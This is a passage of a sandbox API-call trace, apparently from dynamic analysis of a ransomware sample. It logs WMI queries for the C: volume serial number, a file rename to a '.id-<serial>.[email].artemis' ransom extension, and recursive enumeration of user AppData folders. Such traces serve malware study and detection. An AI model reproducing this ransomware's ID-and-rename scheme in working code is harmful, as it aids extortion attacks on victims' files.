[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef8c | out: ppvObject=0x71eef8c*=0x6736ec8) returned 0x0 [0195.626] WbemLocator:IUnknown:Release (This=0x672f418) returned 0x0 [0195.626] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eebac | out: ppvObject=0x71eebac*=0x6736ec8) returned 0x0 [0195.626] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eeb68 | out: ppvObject=0x71eeb68*=0x0) returned 0x80004002 [0195.626] WbemLocator:IUnknown:AddRef (This=0x6736ec8) returned 0x3 [0195.626] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee4c4 | out: ppvObject=0x71ee4c4*=0x0) returned 0x80004002 [0195.626] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee474 | out: ppvObject=0x71ee474*=0x0) returned 0x80004002 [0195.626] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee480 | out: ppvObject=0x71ee480*=0x0) returned 0x80004002 [0195.626] CoGetContextToken (in: pToken=0x71ee4e0 | out: pToken=0x71ee4e0) returned 0x0 [0195.627] CoGetContextToken (in: pToken=0x71ee8e8 | out: pToken=0x71ee8e8) returned 0x0 [0195.627] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee978 | out: ppvObject=0x71ee978*=0x0) returned 0x80004002 [0195.627] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x2 [0195.627] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x1 [0195.627] CoGetContextToken (in: pToken=0x71eef58 | out: pToken=0x71eef58) returned 0x0 [0195.627] CoGetContextToken (in: pToken=0x71eeeb8 | out: pToken=0x71eeeb8) returned 0x0 [0195.627] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x71eef88*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eef84 | out: ppvObject=0x71eef84*=0x6736ec8) returned 0x0 [0195.627] WbemLocator:IUnknown:AddRef (This=0x6736ec8) returned 0x3 [0195.627] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x2 [0195.627] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x71ef11c | out: puCount=0x71ef11c*=0x2) returned 0x0 [0195.627] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=8, puBuffLength=0x71ef118*=0x0, pszText=0x0 | out: puBuffLength=0x71ef118*=0xf, pszText=0x0) returned 0x0 [0195.627] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=8, puBuffLength=0x71ef118*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef118*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.627] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71eeff4 | out: ppv=0x71eeff4*=0x6737068) returned 0x0 [0195.627] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737068, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71ef088 | out: ppNamespace=0x71ef088*=0x674815c) returned 0x0 [0196.857] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef24 | out: ppvObject=0x71eef24*=0x781904) returned 0x0 [0196.857] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781904, pProxy=0x674815c, pAuthnSvc=0x71eef74, pAuthzSvc=0x71eef70, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c, pImpLevel=0x71eef5c, pAuthInfo=0x71eef60, pCapabilites=0x71eef64 | out: pAuthnSvc=0x71eef74*=0xa, pAuthzSvc=0x71eef70*=0x0, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c*=0x6, pImpLevel=0x71eef5c*=0x2, pAuthInfo=0x71eef60, pCapabilites=0x71eef64*=0x1) returned 0x0 [0196.857] WbemLocator:IUnknown:Release (This=0x781904) returned 0x1 [0196.857] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef18 | out: ppvObject=0x71eef18*=0x781924) returned 0x0 [0196.857] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef14 | out: ppvObject=0x71eef14*=0x781904) returned 0x0 [0196.857] WbemLocator:IClientSecurity:SetBlanket (This=0x781904, pProxy=0x674815c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0196.858] WbemLocator:IUnknown:Release (This=0x781904) returned 0x2 [0196.858] WbemLocator:IUnknown:Release (This=0x781924) returned 0x1 [0196.858] CoTaskMemFree (pv=0x77dde8) [0196.858] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x0 [0196.858] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb14 | out: ppvObject=0x71eeb14*=0x781924) returned 0x0 [0196.858] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eead0 | out: ppvObject=0x71eead0*=0x0) returned 0x80004002 [0196.858] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee8ec | out: ppvObject=0x71ee8ec*=0x0) returned 0x80004002 [0196.859] WbemLocator:IUnknown:AddRef (This=0x781924) returned 0x3 [0196.859] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee42c | out: ppvObject=0x71ee42c*=0x0) returned 0x80004002 [0196.859] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee3dc | out: ppvObject=0x71ee3dc*=0x0) returned 0x80004002 [0196.860] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee3e8 | out: ppvObject=0x71ee3e8*=0x781884) returned 0x0 [0196.860] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781884, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee3f0 | out: pCid=0x71ee3f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.860] WbemLocator:IUnknown:Release (This=0x781884) returned 0x3 [0196.860] CoGetContextToken (in: pToken=0x71ee448 | out: pToken=0x71ee448) returned 0x0 [0196.860] CoGetContextToken (in: pToken=0x71ee850 | out: pToken=0x71ee850) returned 0x0 [0196.860] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8e0 | out: ppvObject=0x71ee8e0*=0x78190c) returned 0x0 [0196.860] WbemLocator:IRpcOptions:Query (in: This=0x78190c, pPrx=0x781924, dwProperty=2, pdwValue=0x71ee908 | out: pdwValue=0x71ee908) returned 0x80004002 [0196.860] WbemLocator:IUnknown:Release (This=0x78190c) returned 0x3 [0196.860] WbemLocator:IUnknown:Release (This=0x781924) returned 0x2 [0196.860] CoGetContextToken (in: pToken=0x71eee28 | out: pToken=0x71eee28) returned 0x0 [0196.860] CoGetContextToken (in: pToken=0x71eed88 | out: pToken=0x71eed88) returned 0x0 [0196.860] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x71eee58*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eee54 | out: ppvObject=0x71eee54*=0x674815c) returned 0x0 [0196.860] WbemLocator:IUnknown:AddRef (This=0x674815c) returned 0x4 [0196.860] WbemLocator:IUnknown:Release (This=0x674815c) returned 0x3 [0196.860] WbemLocator:IUnknown:Release (This=0x674815c) returned 0x2 [0196.860] SysStringLen (param_1=0x0) returned 0x0 [0196.860] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67388c0, puCount=0x71ef1ec | out: puCount=0x71ef1ec*=0x0) returned 0x0 [0196.860] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x71ef1e8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1e8*=0x20, pszText=0x0) returned 0x0 [0196.861] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x71ef1e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.861] CoGetContextToken (in: pToken=0x71eee58 | out: pToken=0x71eee58) returned 0x0 [0196.861] WbemLocator:IUnknown:AddRef (This=0x781924) returned 0x3 [0196.861] WbemLocator:IUnknown:QueryInterface (in: This=0x781924, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecec | out: ppvObject=0x71eecec*=0x781924) returned 0x0 [0196.861] WbemLocator:IUnknown:Release (This=0x781924) returned 0x3 [0196.861] WbemLocator:IUnknown:Release (This=0x781924) returned 0x2 [0196.861] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x71ef1f0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f0*=0x20, pszText=0x0) returned 0x0 [0196.861] WbemDefPath:IWbemPath:GetText (in: This=0x67388c0, lFlags=2, puBuffLength=0x71ef1f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.861] IWbemServices:GetObject (in: This=0x674815c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x71ef1a4*=0x0, ppCallResult=0x0 | out: ppObject=0x71ef1a4*=0x673bac8, ppCallResult=0x0) returned 0x0 [0197.521] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x71ef1a4 | out: puCount=0x71ef1a4*=0x2) returned 0x0 [0197.521] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x71ef1a0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1a0*=0xf, pszText=0x0) returned 0x0 [0197.521] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x71ef1a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef1a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.521] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x33fb44c*=0, plFlavor=0x33fb450*=0 | out: pVal=0x71ef1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x33fb44c*=8, plFlavor=0x33fb450*=0) returned 0x0 [0197.521] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.521] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.521] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x33fb44c*=8, plFlavor=0x33fb450*=0 | out: pVal=0x71ef1a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x33fb44c*=8, plFlavor=0x33fb450*=0) returned 0x0 [0197.521] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.521] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.521] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFilePart=0x0) returned 0x28 [0197.521] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x53 [0197.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef208) returned 1 [0197.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), fInfoLevelId=0x0, lpFileInformation=0x71ef284 | out: lpFileInformation=0x71ef284*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14)) returned 1 [0197.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef204) returned 1 [0197.522] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0197.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef33c) returned 1 [0197.523] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0x71eee44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0197.523] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", nBufferLength=0x105, lpBuffer=0x71eee18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpFilePart=0x0) returned 0x26 [0197.523] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x71ef064 | out: lpFindFileData=0x71ef064*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b330 [0197.523] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef074 | out: lpFindFileData=0x71ef074*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.523] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef074 | out: lpFindFileData=0x71ef074*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0197.587] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef074 | out: lpFindFileData=0x71ef074*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0197.587] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef074 | out: lpFindFileData=0x71ef074*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaafc340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaafc340, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0197.587] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef074 | out: lpFindFileData=0x71ef074*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaafc340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaafc340, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0197.587] FindClose (in: hFindFile=0x77b330 | out: hFindFile=0x77b330) returned 1 [0197.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2fc) returned 1 [0197.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef308) returned 1 [0197.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef33c) returned 1 [0197.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0x71eee44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0197.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", nBufferLength=0x105, lpBuffer=0x71eee18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpFilePart=0x0) returned 0x26 [0197.588] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x71ef064 | out: lpFindFileData=0x71ef064*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b330 [0197.588] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef074 | out: lpFindFileData=0x71ef074*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.588] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef074 | out: lpFindFileData=0x71ef074*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0197.588] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef074 | out: lpFindFileData=0x71ef074*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0197.588] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef074 | out: lpFindFileData=0x71ef074*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaafc340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaafc340, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0197.588] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef074 | out: lpFindFileData=0x71ef074*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0197.589] FindClose (in: hFindFile=0x77b330 | out: hFindFile=0x77b330) returned 1 [0197.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2fc) returned 1 [0197.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef308) returned 1 [0197.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef2ec) returned 1 [0197.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x71eedf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0197.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", nBufferLength=0x105, lpBuffer=0x71eedc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpFilePart=0x0) returned 0x2c [0197.589] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x71ef014 | out: lpFindFileData=0x71ef014*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b330 [0197.589] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, 